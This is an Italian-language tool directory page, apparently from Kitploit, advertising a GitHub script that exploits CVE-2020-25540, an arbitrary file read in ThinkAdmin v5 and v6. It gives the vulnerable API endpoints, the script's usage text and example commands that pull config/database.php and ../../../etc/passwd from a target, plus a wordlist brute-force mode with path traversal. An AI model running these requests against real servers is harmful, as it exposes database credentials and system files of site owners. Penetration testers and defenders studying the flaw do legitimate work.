Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-25540 — Sfruttamento della vulnerabilità di lettura arbitraria dei file in ThinkAdmin v5 v6, con brute force tramite dizionario personalizzabile. | Kitploit
Strumenti/GitHubGitHub/simonlee-hello/cve-2020-25540
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubsimonlee-hello/cve-2020-25540

CVE-2020-25540

Sfruttamento della vulnerabilità di lettura arbitraria dei file in ThinkAdmin v5 v6, con brute force tramite dizionario personalizzabile.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

cve-2020-25540

Questo script viene utilizzato per lo sfruttamento della vulnerabilità di lettura arbitraria dei file nelle versioni v5 e v6 di ThinkAdmin

==L'endpoint API può variare tra le diverse versioni (alcune basate su sviluppi secondari dell'ThinkAdmin originale)==

  • L'endpoint della versione originale è: /admin.html?s=admin/api.Update/get?/encode/xxxx
  • Quello della mia versione (il fork di uno schema Ponzi) è: /admin.html?s=admin/api.Update/read?encode=xxxx

Uso di base

root@kitploit:~
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
                         [-p PARALLEL]

通过 API 读取文件并获取响应

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标 IP 地址或域名
  -f FILE, --file FILE  要读取的文件路径
  -w WORDLIST, --wordlist WORDLIST
                        字典文件路径,提供多个文件路径或文件名
  -b BASE_PATH, --base-path BASE_PATH
                        基础路径,用于拼接字典文件中的路径
  -p PARALLEL, --parallel PARALLEL
                        并行线程数
root@kitploit:~
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10
Scarica lo strumento